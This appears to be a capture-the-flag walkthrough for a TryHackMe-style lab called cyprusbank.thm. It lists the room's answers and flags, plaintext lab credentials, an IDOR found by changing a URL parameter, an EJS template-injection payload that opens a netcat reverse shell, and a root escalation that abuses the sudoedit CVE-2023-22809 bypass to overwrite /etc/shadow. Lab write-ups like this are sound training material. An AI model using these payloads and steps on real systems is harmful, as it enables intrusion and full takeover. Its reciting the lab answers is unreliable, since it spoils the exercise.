Q: What's Tyrell Wellick's phone number?
A: 842-029-5701
- nmap scan shows, port 22 and 80 are open
- navigate to port 80 via browser, shows domain cyprusbank.thm (add to /etc/hosts)
- cyprusbank.thm didnt show much, so with gobuster vhost found subdomain admin.cyprusbank.thm (add to /etc/hosts)
- creds that was given
Olivia Cortez:olivi8worked there. - navigate to "messages" and at url can be seen http://admin.cyprusbank.thm/messages/?c=5 , tryed to lower the parameter 'c' and at 0 it showed
Gayle Bev:p~]P@5!6;rs558:q - logged in as Gayle Bev and phones numbers can be seen.
Q: User flag?
A: THM{4lways_upd4te_uR_d3p3nd3nc!3s}
- after entering as Gayle Bev, the 'settings' tab on the site can be accessable.
- via burp-suite repeater I've played abit with the request, and it doesnt actually changes the user's password, so i tryed to delete the parameter of 'password' and it reveals some embeded js files (EJS).
- Via google, found SSTI for EJS, and the payload looked like this: (had to use BusyBox since my nc and target's nc didnt match verions and without it, i couldnt execute commands) name=1&settings[view options][client]=true&settings[view options][escapeFunction]=1;return global.process.mainModule.constructor._load('child_process').execSync('busybox nc 1234 -e /bin/sh');
- logged in as user 'web' and it had the flag in hes home dir.
Q: root flag?
A: THM{4nd_uR_p4ck4g3s}
- upgraded shell via python3 and stty raw...
- sudo -l , revealed the user can execute without pass this:
sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
- searched exploit for sudoedit 1.9.12p1, found this usefull:
https://www.vicarius.io/vsociety/posts/cve-2023-22809-sudoedit-bypass-analysis
- export EDITOR="nano -- /etc/shadow"
- (on my kali) openssl passwd -6
- run "sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm"
- replaced root's password and did 'su root' (with my new pass)